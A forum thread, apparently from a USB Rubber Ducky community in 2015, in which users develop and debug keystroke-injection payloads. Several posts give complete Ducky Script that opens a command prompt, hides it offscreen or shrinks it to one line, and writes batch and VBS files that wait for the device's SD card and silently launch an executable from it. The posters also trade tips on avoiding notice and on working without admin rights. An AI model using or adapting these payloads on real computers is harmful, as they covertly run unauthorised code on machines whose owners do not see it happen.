overwraith Posted April 18, 2015 Posted April 18, 2015 (edited) So, It has come to my attention that some of the payloads have a flaw in their processing, whereby the ducky drive finding code will not run correctly if it is not on an admin machine. I have known for a while, but haven't found a way to fix it. The other day I found out about the "vol" command in batch. So if any of you are knowledgable in batch, I have at least one question, does the "vol" command work on more than one platform, ex windows 7, xp, vista etc. If it does we can retool the code to use "vol" instead of diskpart which has a crippling error when running on non admin computers. Here is some code I have been working on, executes in the command prompt, not a batch file yet. It doesn't work right yet, I am having trouble with the DuckyDrive variable not setting. If any of you know how to fix this, then please post. for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( for /f "tokens=6 delims= " %i in ('Vol %d:') do if %i NEQ "Drive" if %i EQU "DUCKY" echo set DuckyDrive=%d: ) Edited April 18, 2015 by overwraith Quote
Xcellerator Posted April 19, 2015 Posted April 19, 2015 According to https://en.wikipedia.org/wiki/Vol_%28command%29, its present in DOS, OS/2 and Windows. It doesn't specify exactly what versions of Windows, but if it was in DOS, its probably been there since forever anyway. Nice fix, by the way! Quote
overwraith Posted April 19, 2015 Author Posted April 19, 2015 It's not done yet, it is still erroring somewhere. I gotta try to figure out why the set command isn't working. I know the vol command is present on my computer, Windows 7, but it is reassuring to hear that it has been around since DOS. Quote
overwraith Posted April 19, 2015 Author Posted April 19, 2015 (edited) I figured it out, needed quotes in the 'if' statement first parameter. I swear, somebody needs to send me a few batch books, it is difficult gleaning a comprehensive cirriculum from just online web pages and snippets. Also factor in that this stuff was pretty much before my time. for %d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( for /f "tokens=6 delims= " %i in ('Vol %d:') do (if "%i" EQU "DUCKY" set DuckyDrive=%d: )) This should be the new RunEXE from SD payload, but I haven't got a chance to test it yet, am downloading something, and apparently every time I plug in the ducky to this expansion USB/SD card slot in the front of my computer it drops all currently connected USB devices. Wierd. I need this external hard drive connected during the download. REM Author: overwraith REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER Edited April 19, 2015 by overwraith Quote
overwraith Posted April 19, 2015 Author Posted April 19, 2015 (edited) ty, I just tested it, had to change a couple of things. Works now. I altered in my original post. Is also now on the github. Edited April 19, 2015 by overwraith Quote
White Light Posted April 28, 2015 Posted April 28, 2015 Personally, I would do something like this, to avoid having to loop through each drive letter: for /f "tokens=3" %v in ('ver') do if %v==XP (for /f "tokens=3" %a in ('echo list volume ^| diskpart ^| find "Volume" ^| find "RUN"') do start "" %a:\run.exe) else (for /f %a in ('wmic logicaldisk get volumename^,name ^| find "RUN"') do start "" %a\run.exe) Works on Windows XP using diskpart as well as Vista+ using wmic. Quote
overwraith Posted April 28, 2015 Author Posted April 28, 2015 (edited) Yes, except if you are non admin, or guest, which will make a diskpart black box pop up, derailing the script. There was a reason I was exploring alternate routes. Also, ducks used to be a lot slower than they are now, I would have to test if it automatically mounts the SD immediately. Edited April 28, 2015 by overwraith Quote
White Light Posted May 6, 2015 Posted May 6, 2015 If you look, it actually only uses diskpart on XP (as XP home doesn't have access to the WMI console). Everything else is all just done in one command. If you were to run CMD and have the above run via the command line directly, the box would be visible only for the amount of time necessary to either query diskpart or WMIC (a few seconds at most). Ducks only seem to mount the FS slowly the first time it is plugged into a computer, making testing timings difficult. I've got a work-in-progress using VBS to loop in the background waiting for the drive to load, which means that timing wouldn't ever be an issue. In the mean time, I would suggest that instead of using cmd /Q /D /T:7F /F:OFF /V:ON /Kyou could try changing the colour setting to something with two dark settings, like 01 (if my memory serves that's dark blue on black background). You could also try reducing the console size to the bare minimum (1 line and somewhere between 10-18 columns, I can never remember). cmd /Q /D /T:01 /F:OFF /V:ON /K mode con cols=18 lines=1Please forgive any mistakes. I'm on mobile right now, so I can't exactly test the syntax of the mode command. Quote
overwraith Posted May 6, 2015 Author Posted May 6, 2015 Ok, I see the logic now. That's also a good solution. Quote
White Light Posted May 7, 2015 Posted May 7, 2015 Here's the VBS code I've been working on, along with the modified CMD string. REM DEFAULT_DELAY 20 DELAY 2000 GUI r DELAY 100 STRING cmd /T:01 /K mode con cols=15 lines=1©/y con %tmp%\z.vbs ENTER DELAY 300 STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d="" ENTER STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name ENTER STRING if d="" then wscript.sleep 500 ENTER STRING loop ENTER STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false ENTER DELAY 10 CTRL z ENTER DELAY 50 STRING start "" %tmp%\z.vbs&exit ENTER Quote
White Light Posted May 7, 2015 Posted May 7, 2015 Here's the VBS code I've been working on, along with the modified CMD string. REM DEFAULT_DELAY 20 DELAY 2000 GUI r DELAY 100 STRING cmd /T:01 /K mode con cols=15 lines=1©/y con %tmp%\z.vbs ENTER DELAY 300 STRING on error resume next:Set s = GetObject("winmgmts:"):d="":do while d="" ENTER STRING Set c = s.ExecQuery("Select * from Win32_Volume Where Label='DUCKY'"):set o=c.ItemIndex(0):d=o.Name ENTER STRING if d="" then wscript.sleep 500 ENTER STRING loop ENTER STRING Set w = WScript.CreateObject("WScript.Shell"):w.Run d&"\r.bat", 1 , false ENTER DELAY 10 CTRL z ENTER DELAY 50 STRING start "" %tmp%\z.vbs&exit ENTER Weird, it didn't include everything I typed after the code. I really can't be bothered to type out all that again, but I'll summarize. Some CMD switches don't do much or nothing at all. I've included only the ones necessary. Making the window smaller using mode instead of moving it is probably less noticeable. Moving to the left is better than down, as the window generally spawns in upper-left side of screen. VBS code runs silent, loops until it finds the drive named "DUCKY". 90% certain VBS code will work on all XP versions and above. If it won't work on something, it'll be XP Home. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.